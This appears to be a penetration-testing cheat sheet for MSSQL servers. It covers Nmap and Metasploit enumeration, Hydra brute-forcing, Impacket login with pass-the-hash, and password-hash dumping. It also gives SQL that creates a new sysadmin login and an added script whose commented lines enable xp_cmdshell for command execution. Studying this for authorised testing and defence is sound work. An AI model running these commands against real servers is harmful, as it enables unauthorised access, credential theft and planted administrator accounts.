MS-SQL (TCP 1433)

1. Nmap for MSSQL Enumeration:

  • List the MSSQL-related Nmap scripts and what each one does (quote the pattern so the shell does not expand the *; a bare expression such as "ms and sql" is treated as category names and fails):

    nmap --script-help "ms-sql-*"
  • Run a set of MSSQL scripts against one host, passing credentials as script arguments (an empty mssql.password tests a blank sa password; drop the credential arguments to run the scripts unauthenticated):

    nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13
  • Run individual MSSQL scripts, or every ms-sql-* script at once (the wildcard must be quoted):

    nmap --script ms-sql-info -p 1433 <target-ip>
    nmap --script ms-sql-config -p 1433 <target-ip>
    nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
    nmap --script "ms-sql-*" -p 1433 <target-ip>

2. Metasploit Modules for MSSQL:

  • Common MSSQL Metasploit modules (all are auxiliary modules; each needs RHOSTS set, and all but the scanners also need USERNAME and PASSWORD before run):

    msfconsole
    msf> use auxiliary/admin/mssql/mssql_enum
    msf> use auxiliary/admin/mssql/mssql_enum_domain_accounts
    msf> use auxiliary/admin/mssql/mssql_enum_sql_logins
    msf> use auxiliary/admin/mssql/mssql_findandsampledata
    msf> use auxiliary/admin/mssql/mssql_idf
    msf> use auxiliary/scanner/mssql/mssql_hashdump
    msf> use auxiliary/scanner/mssql/mssql_schemadump
  • These modules allow you to:

    • Enumerate server configuration, SQL logins and domain accounts (mssql_enum, mssql_enum_sql_logins, mssql_enum_domain_accounts).

    • Search tables for sensitive-looking columns and sample their contents (mssql_findandsampledata, mssql_idf).

    • Dump login password hashes (requires sysadmin) and the schema of every accessible database (mssql_hashdump, mssql_schemadump).

3. Bruteforcing MSSQL with Hydra:

  • Bruteforce with a username list (Hydra's mssql module uses SQL authentication only; add -s <port> for a non-default port). Failed logins are written to the SQL Server error log by default, and logins created with CHECK_POLICY = ON can be locked out:

    hydra -L usernames.txt -p password <target-ip> mssql
  • Bruteforce with a password list against one login:

    hydra -l username -P passwords.txt <target-ip> mssql

4. Connecting to MSSQL with Impacket:

  • SQL Authentication (a SQL login has no domain part; -port defaults to 1433 and can be omitted; omit :password to be prompted):

    impacket-mssqlclient -port 1433 username:password@<target-ip>
  • Windows Authentication (domain or local Windows account; -hashes LMHASH:NTHASH can replace the password for pass-the-hash):

    impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

5. Connecting to MSSQL with sqsh:

  • Basic connection (sqsh sends a batch only when you type go on a line of its own):

    sqsh -S <target-ip> -U username -P password
  • Connect to a specific database:

    sqsh -S <target-ip> -U username -P password -D database

6. SQL Commands for Enumeration:

  • Get all users of the current database (server-level logins are in sys.server_principals instead):

    SELECT * FROM sys.database_principals;
  • Switch to a specific database:

    USE <database>;
  • List available databases (sysdatabases is a deprecated compatibility view; sys.databases is the current one):

    SELECT * FROM master.dbo.sysdatabases;
  • List tables within the current database:

    SELECT * FROM information_schema.tables;
  • Get content from a table:

    SELECT * FROM <database_name>.dbo.<table_name>;
  • Get the MSSQL version:

    SELECT @@version;
  • Check who holds EXECUTE on xp_cmdshell (it lives in master). Holding the permission is not enough on its own: the procedure must also be enabled through the xp_cmdshell server configuration option, which needs sysadmin:

    USE master;
    EXEC sp_helprotect 'xp_cmdshell';
  • Get linked servers:

    EXEC sp_linkedservers;
    SELECT * FROM sys.servers;
  • Create a new login and add it to sysadmin (requires sysadmin yourself; the password must satisfy the Windows password policy unless CHECK_POLICY = OFF; sp_addsrvrolemember still works but is deprecated in favour of ALTER SERVER ROLE sysadmin ADD MEMBER):

    CREATE LOGIN tester WITH PASSWORD = 'password';
    EXEC sp_addsrvrolemember 'tester', 'sysadmin';
  • Get the current database user name (SYSTEM_USER returns the server login instead):

    SELECT user_name();
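The one-liners above can be combined into a single enumeration pass to run right after connecting. The script below is an added example, not part of the original page or of any tool it mentions; it assumes SQL Server 2012 or later and that the connected login can see the catalog rows it queries (rows you lack permission on simply do not appear). It goes beyond the individual commands above by using the server-level views (sys.server_principals, sys.databases, sys.configurations, sys.linked_logins) rather than the per-database ones:

```sql
USE master;   -- xp_cmdshell lives here; the catalog views below are server-wide anyway

-- 1. Identity: login vs. database user, sysadmin membership, server and version
SELECT SYSTEM_USER                      AS login_name,   -- server login
       USER_NAME()                      AS db_user,      -- user mapped in the current database
       IS_SRVROLEMEMBER('sysadmin')     AS is_sysadmin,  -- 1 = member, 0 = not, NULL = unknown
       @@SERVERNAME                     AS server_name,
       SERVERPROPERTY('ProductVersion') AS version;

-- 2. Server-level logins and their fixed server roles
--    (sys.database_principals only shows users of one database)
SELECT p.name, p.type_desc, p.is_disabled, r.name AS server_role
FROM sys.server_principals AS p
LEFT JOIN sys.server_role_members AS m ON m.member_principal_id = p.principal_id
LEFT JOIN sys.server_principals   AS r ON r.principal_id = m.role_principal_id
WHERE p.type IN ('S', 'U', 'G')       -- SQL login, Windows login, Windows group
ORDER BY p.name;

-- 3. Databases, flagged by whether this login can actually open each one
SELECT name, state_desc, HAS_DBACCESS(name) AS can_access
FROM sys.databases
ORDER BY name;

-- 4. xp_cmdshell: is it switched on, and do we hold EXECUTE on it?
--    value_in_use = 1 means enabled; HAS_PERMS_BY_NAME returns 1 / 0 / NULL.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

SELECT HAS_PERMS_BY_NAME('dbo.xp_cmdshell', 'OBJECT', 'EXECUTE') AS can_exec_xp_cmdshell;

-- 5. Linked servers, the remote login each one maps to, and whether EXEC ... AT is allowed
SELECT s.name, s.data_source, s.provider, s.is_rpc_out_enabled,
       l.remote_name, l.uses_self_credential
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE s.is_linked = 1;

-- 6. Only when is_sysadmin = 1 above and the engagement allows it: enable xp_cmdshell.
--    Both sp_configure calls change persistent server configuration and are recorded
--    in the SQL Server error log. Left commented so the enumeration pass changes nothing.
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 1;          RECONFIGURE;
-- EXEC master.dbo.xp_cmdshell 'whoami';
```

Paste the statements into the interactive shell of either client. impacket-mssqlclient also accepts -file, but it sends the file one line at a time, so for that mode put each statement on a single line. For a linked server found in step 5, EXEC ('SELECT SYSTEM_USER') AT [name] needs is_rpc_out_enabled = 1, whereas OPENQUERY([name], 'SELECT SYSTEM_USER') works without it; both run as the remote_name login shown for that server.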
